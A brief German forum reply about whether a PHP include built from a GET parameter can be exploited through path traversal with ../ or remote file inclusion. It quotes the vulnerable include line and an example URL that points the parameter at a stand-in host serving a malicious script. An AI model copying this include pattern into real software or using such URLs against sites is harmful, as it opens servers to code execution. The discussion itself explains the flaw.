Hi,

Aus dem ist man raus, sobald man einen mit ../ beginnenden Parameter übergibt.

Klar aber bedingt dadurch das die Angabe da ist, entfällt schon
mal die URL Option ein Script reinzuziehen.

»» include("ordner/".$_GET["content"].".php");

http://xyz.de/?content=http://gefahr.com/boeses-script

Also Du weisst auch nicht, was Dieter meinen könnte?

Hannes